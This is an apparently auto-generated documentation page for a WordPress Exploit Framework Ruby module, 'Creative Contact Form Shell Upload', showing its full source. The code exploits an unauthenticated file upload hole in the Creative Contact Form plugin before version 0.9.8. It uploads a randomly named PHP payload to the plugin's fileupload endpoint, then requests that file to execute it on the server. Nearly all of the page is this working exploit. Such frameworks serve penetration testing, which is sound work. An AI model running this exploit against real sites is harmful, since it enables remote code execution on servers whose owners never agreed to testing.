class Wpxf::Exploit::CreativeContactFormShellUpload
Public Class Methods
new()
click to toggle source
Calls superclass method
Wpxf::Module::new
# File lib/wpxf/modules/exploit/shell/creative_contact_form_shell_upload.rb, line 6 def initialize super update_info( name: 'Creative Contact Form Shell Upload', desc: 'This module exploits a file upload vulnerability in all versions '\ 'of the Creative Contact Form plugin prior to version 0.9.8 which '\ 'allows unauthenticated users to upload and execute PHP scripts '\ 'in the context of the web server.', author: [ 'Gianni Angelozzi', # Vulnerability discovery 'rastating' # WPXF module ], references: [ ['EDB', '35057'], ['WPVDB', '7652'] ], date: 'Oct 22 2014' ) end
Public Instance Methods
check()
click to toggle source
# File lib/wpxf/modules/exploit/shell/creative_contact_form_shell_upload.rb, line 27 def check check_plugin_version_from_readme('sexy-contact-form', '0.9.8') end
payload_body_builder(payload_name)
click to toggle source
# File lib/wpxf/modules/exploit/shell/creative_contact_form_shell_upload.rb, line 39 def payload_body_builder(payload_name) builder = Utility::BodyBuilder.new builder.add_file_from_string('files[]', payload.encoded, payload_name) builder end
plugin_url()
click to toggle source
# File lib/wpxf/modules/exploit/shell/creative_contact_form_shell_upload.rb, line 31 def plugin_url normalize_uri(wordpress_url_plugins, 'sexy-contact-form') end
run()
click to toggle source
Calls superclass method
Wpxf::Module#run
# File lib/wpxf/modules/exploit/shell/creative_contact_form_shell_upload.rb, line 45 def run return false unless super emit_info 'Preparing payload...' payload_name = "#{Utility::Text.rand_alpha(rand(5..10))}.php" builder = payload_body_builder(payload_name) emit_info 'Uploading payload...' res = nil builder.create do |body| res = execute_post_request(url: uploader_url, body: body) end if res.nil? || res.timed_out? emit_error 'No response from the target' return false end if res.code != 200 || res.body !~ /files|#{Regexp.escape(payload_name)}/ emit_info "Response code: #{res.code}", true emit_info "Response body: #{res.body}", true emit_error 'Failed to upload payload' return false end payload_url = normalize_uri(plugin_url, 'includes', 'fileupload', 'files', payload_name) emit_success "Uploaded the payload to #{payload_url}", true emit_info 'Executing the payload...' res = execute_get_request(url: payload_url) if res && res.code == 200 && !res.body.strip.empty? emit_success "Result: #{res.body}" end return true end
uploader_url()
click to toggle source
# File lib/wpxf/modules/exploit/shell/creative_contact_form_shell_upload.rb, line 35 def uploader_url normalize_uri(plugin_url, 'includes', 'fileupload', 'index.php') end